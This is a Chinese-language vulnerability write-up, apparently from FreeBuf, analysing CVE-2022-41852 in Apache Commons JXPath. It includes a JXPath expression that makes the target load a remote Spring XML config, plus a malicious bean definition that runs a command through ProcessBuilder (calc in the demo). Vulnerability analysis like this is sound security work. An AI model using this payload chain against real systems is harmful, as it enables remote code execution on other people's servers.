CVE-2022-41852 Apache Commons Jxpath命令执行漏洞分析

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

漏洞

CVE-2022-41852 Apache Commons Jxpath命令执行漏洞分析

2022-10-19 14:34:44

所属地北京

项目介绍

Apache Commons JXPath是美国阿帕奇（Apache）基金会的一种 XPath 1.0 的基于 Java 的实现。JXPath 为使用 XPath 语法遍历 JavaBeans、DOM 和其他类型的对象的图形提供了 API。

漏洞描述

Apache Commons JXPath 存在安全漏洞，攻击者可以利用除compile()和compilePath()函数之外的所有处理XPath字符串的JXPathContext类函数通过XPath表达式从类路径加载任何Java类，从而执行恶意代码。

利用范围

Apache Commons JXpath <= 1.3

漏洞分析

环境搭建

使用github上POC进行分析复现https://github.com/Warxim/CVE-2022-41852

漏洞POC使用Spring框架，简单实现接受用户输入并使用它从Person类中检索指定的数据。

前置知识

在漏洞分析之前，首先了解一下JXPath及用法（参考官网用户指南：https://commons.apache.org/proper/commons-jxpath/users-guide.html）

JXPath除了能够像XPatth一样能够访问XML文档各种元素之外，还能够读取和写入JavaBean的属性，获取和设置数组、集合、映射、透明容器、Servlet 中的各种上下文对象等元素。

JXPath 支持开箱即用的标准 XPath 函数。它还支持“标准”扩展函数（基本上是通往 Java 的桥梁），以及完全自定义的扩展函数。

代码分析

JXPath支持自定义扩展函数，首先看一下PackageFunctions这个类

在org.apache.commons.jxpath.PackageFunctions#getFunction中，存在methodName.equals("new"）

这里实例化的xpath表达式设置为了xxx.new()，截取括号前作为方法名，如果调用new方法就被视为实例化，两个判断一个是实例化构造函数，另一个是静态方法。

往下分析，如果是实例化构造函数，在Spring框架中可通过加载远程配置实现命令执行，这里使用org.springframework.context.support.ClassPathXmlApplicationContext类，构造payload：

org.springframework.context.support.ClassPathXmlApplicationContext.new("http://127.0.0.1:8001/test.xml")

恶意的xml文件使用Spring-bean，设置init-method实现RCE

"http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>cmd</value>
                <value>/c</value>
                <value><![CDATA[calc]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

在实例化之后，继续跟进会来到org.apache.commons.jxpath.ri.compiler.ExtensionFunction#computeValue

在获得了org.apache.commons.jxpath.Function对应的这个实例后，会调⽤具体的invoke实现。